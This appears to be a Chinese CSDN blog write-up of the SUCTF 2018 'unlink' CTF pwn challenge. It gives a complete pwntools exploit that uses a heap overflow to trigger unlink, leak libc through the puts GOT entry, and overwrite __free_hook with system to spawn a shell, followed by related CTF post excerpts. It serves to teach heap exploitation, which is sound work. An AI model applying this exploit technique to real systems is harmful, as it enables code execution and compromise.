【PWN · heap | unlink | free_hook】[SUCTF 2018 招新赛]unlink

最新推荐文章于 2024-01-18 14:58:45 发布
最新推荐文章于 2024-01-18 14:58:45 发布
阅读量456 收藏 3
点赞数
分类专栏: 【PWN · Heap】 文章标签: heap CTF PWN unlink __free_hook
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/134386670
版权
文章讲述了在NSSCTF竞赛中,通过利用程序中的unlink函数和take_note的溢出漏洞,实现内存劫持和__free_hook劫持,从而获取任意地址读写权限并最终获取shell的过程。作者详细展示了exploit的步骤和GDB调试分析。
摘要由CSDN通过智能技术生成

在前期学习了unlink后,今天翻NSSCTF找到一道名为unlink的题目,尝试不看wp做。过程很顺利!

前言

题目对于知识点unlink还是非常裸的,很直接,思路很清晰。

一、题目

二、思路浅析

通过对该程序的反编译,我们发现存在存储malloc得到空间地址的指针序列,存放在bss段上,同时take_note存在溢出漏洞,可以出发unlink——将指针劫持到bss段上指针序列地址。同时malloc到的指针区域有着读写权限,这意味着我们可以通过unlink达到任意地址读写的极高权限!

很明显:

1.unlink

2.__free_hook劫持

三、exp

先给出exp,再把exp过程部分断点效果展示给大家,方便大家理解。(第四部分,对于raw_input()断下处,进行gdb调试分析)

from pwn import *
from pwn import p64,u64
context(arch='amd64',log_level='debug')

# io=process('./pwn')
io=remote('node4.anna.nssctf.cn',28867)
elf=ELF('./pwn')
libc=ELF('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
def touch(size):
    io.sendlineafter(b'chooice :\n',b'1')
    io.sendlineafter(b'size : \n',str(size).encode())

def delete(index):
    io.sendlineafter(b'chooice :\n',b'2')
    io.sendlineafter(b'to delete\n',str(index).encode())

def show(index):
    io.sendlineafter(b'chooice :\n',b'3')
    io.sendlineafter(b'to show\n',str(index).encode())
    io.recvuntil(b'is : ')

def take_note(index,payload):
    io.sendlineafter(b'chooice :\n',b'4')
    io.sendlineafter(b'modify :\n',str(index).encode())
    io.sendafter(b'content\n',payload)

if input('[!]Input "0" to gdb attach : ')=='0':
    gdb.attach(io)
buf=0x6020C0
touch(0x20)  # 写fake-chunk、溢出下一个chunk
touch(0x80)  # free触发unlink
touch(0x100) # 防止和topchunk合并
raw_input('[!]check')

# 写fake-chunk,溢出下一个chunk
prev_size=p64(0)
chunk_size=p64(0x20)
fd=buf-0x18
bk=buf-0x10
content=p64(fd)+p64(bk)
of_prev_size=p64(0x20)
of_chunk_size=p64(0x90)
payload=prev_size+chunk_size+content+of_prev_size+of_chunk_size
take_note(0,payload)
raw_input('[!]check')

# 触发unlink
delete(1)
raw_input('[!]check')

# 修改系列ptr的值
payload=p64(0)*3+p64(0x6020c8)
take_note(0,payload)
raw_input('[!]check')

# 通过puts泄露libc地址
payload=p64(elf.got['puts'])
take_note(0,payload)
raw_input('[!]check')
show(1)
puts=u64(io.recvuntil(b'\x7f')[-6:]+b'\x00\x00')
success(hex(puts))

# __free_hook
libc_base=puts-libc.sym['puts']
free_hook=libc_base+libc.sym['__free_hook']
bin_sh_str=libc_base+next(libc.search(b'/bin/sh\x00'))
payload=p64(free_hook)+p64(bin_sh_str)
take_note(0,payload)
raw_input('[!]check')
system=libc_base+libc.sym['system']
take_note(1,p64(system))
raw_input('[!]check')
delete(2)

io.interactive()

四、exp效果具体分析

1.fake_chunk部分

这是刚分配完三个chunk后的内存情况,当我们执行下面这些语句构造fake_chunk

2.触发unlink

由于我们已经内存精心布置过,这是我们free chunk1能够向前合并chunk0中构造的fake_chunk且绕过保护机制

利用成功!

3.稍作修改

实际已经获得了任意地址读写的能力,但是个人习惯,先将上面的地址稍稍改一下

4.任意地址读——泄露libc——泄露puts真实地址

首先将puts的got表地址写到bss上,再通过show函数访问栈上指针指向的区域,也即puts_got内存储的东西——puts的真实地址,通过相对地址可泄露libc基址进而获得其他需要的函数/字符串地址

5.劫持__free_hook

思路是将__free_hook的got表写在chunk1指针处,将指向字符串'/bin/sh\x00'的指针写在chunk2位置,然后通过take_note函数写__free_hook为system,再free掉chunk2触发system('/bin/sh\x00')

 

 成功获得shell(这里是本地调试)

Mr_Fmnwon
关注
专栏目录
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 5140
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
2018 SUCTF招新赛
qq_42192672的博客
11-15 1802
PWN 1.stack checksec一波 什么保护都没开,可还行,IDA找一波漏洞 read函数百分之百溢出 我们看到了我们喜爱的 改一下rip美滋滋 exp #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal = ['gnome-terminal','-x','b...
攻防世界PWN之Noleak(一题学了好多知识)题解
seaaseesa的博客
11-13 3788
Noleak 本题需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
SUCTF 2018 招新赛之Misc篇刷题记录(14)
Aluxian_的博客
08-20 365
【代码】NSSCTF之Misc篇刷题记录(14)
pwn】[SUCTF 2018 招新赛]unlink --堆利用之unlink
最新发布
question55的博客
01-18 1546
先来看一下程序的保护情况堆栈不可执行,而且还开了canary看一下ida又是经典菜单题,接着分析每一个函数功能就行touch函数:有一个数组存malloc出来的地址delete函数:删除堆中的数据,不存在uaf漏洞show函数:打印堆中数据take_note函数:向堆中写数据分析到这里,根据题目的提示,那就用unlink来打,这里有篇博客可以先学习一下:【pwn学习】堆溢出(三)- Unlink和UAF_堆溢出 got表-CSDN博客首先我们先创建三个堆块debug看一下再看看一下存堆地址的数组接着我们来构
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1518
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
linux 堆溢出 pwn 指南,新手科普 | CTF PWN堆溢出总结
weixin_36467693的博客
05-16 1001
学习汇总序言自从加入RTIS交流群, 在7o8v师傅,gd大佬的帮助下,PWN学习之路进入加速度。下面是八周学习的总结,基本上是按照how2heap路线走的。由于八周内容全写,篇幅太长,这里只讲述每道PWN题所用到的一个知识点。第一节(fastbin_dup_into_stack)知识点利用fastbin之间,单链表的连接的特性, 溢出修改下一个free chunk的地址, 造成任意地址写.例子:...
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 821
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 559
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 200
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
Pwn-gyctf_2020_force
fayinq的博客
03-13 415
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
Pwn Unlink堆攻击技术原理以及例题
红叶的博客
12-17 1103
现在有这么三个chunk,其中我们已经构造好了Unlink的Payload。乍一看可能有点一头雾水,那么如果我们把这段看成一个chunk结构体呢?反之,另一个也是这个道理。glibc 2.23中的unlink宏源码是这样的。,这段恰好满足我们的unlink需求。,也就是我们的fake_chunk。,我们直接查看这个fd指向了哪里。,P是fake_chunk,也就是。这题的堆块指针位于bss段内,是。P是fake_chunk,即可获得我们的fd和bk。complete,或者说。指向的都是同一个地方。
好好说话之Fastbin Attack(4):Arbitrary Alloc
hollk’s blog
01-13 2071
总体来说这个方法并不难,例题2017 0ctf babyheap也不难,如果有仔细看过我的上一篇[2015 9447 CTF : Search Engine](https://blog.csdn.net/qq_41202237/article/details/111320740)的讲解,相信这个方法的例题对你来说只是流程更复杂一点,但是泄露libc啊、malloc_hook啊这种关键步骤还是一致的。流程部分我的方法是拿笔纸把每一步的chunk和bin写出来,这样更加集中注意力,哪里存在变化,都可以很快的发现
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 354
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
pwn题堆利用的一些姿势 -- malloc_hook
lifanxin的博客
04-12 4413
  在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell。因此也就有了我这一系列文章的目的,在got表无法被修改时,我们往往利用的就是下面的一些hook+one
ctf pwn 个人经验记录
jmp esp
05-22 8938
前言记录一下自己在做pwn的过程当中学到的一些东西,以前不知道的东西等等,碰到的坑也会记录在 这里,主要目的是帮助自己记录一下经验。其实每一道题基本上能学到的新东西是有限的,记录下来避免什么时候想不起来。顺序比较乱,基本上根据我做题的顺序定的,比较随意。pwnother place(not from ctf) 多用gdb调试,有思路可以先写出来调试一下看看效果再说 遇见pie考虑写malloc_h
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3216
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
攻防世界PWN之oneman_army题解
seaaseesa的博客
02-09 935
oneman_army 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,9011功能可以溢出 最大申请0x1FF大小的堆,申请次数没有限制 Delete功能没有把指针清空 本题,已知libc为2.27,所以存在tcache bin机制,可以很容易利用。我们肯定是要攻击free_hook或者malloc_hook,那么首先需要泄露地址,而泄露地址,需要利用unso...
2019全国大学生信息安全竞赛pwn[数组越界任意写,doublefree,ret2dl-resolve]
九层台
04-25 1820
0x01your_pwn Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 保护全开的栈地址任意写 v4的索引是可以输入的,也会输出v4数组的内容。比较麻烦的是每次只能读写一...
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
08-17
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA是用来表示不同内存区块的缩写标记。其中,STACK代表栈空间,HEAP代表堆空间,CODE代表代码段,DATA代表数据段,RWX代表可读、可写、可执行的空间,RODATA代表只读的数据段。这些标记通常用于描述程序的内存布局,以帮助理解程序的运行机制。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [realloc函数UAF利用|攻防世界pwn进阶区supermarket](https://blog.csdn.net/weixin_43092232/article/details/105014161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值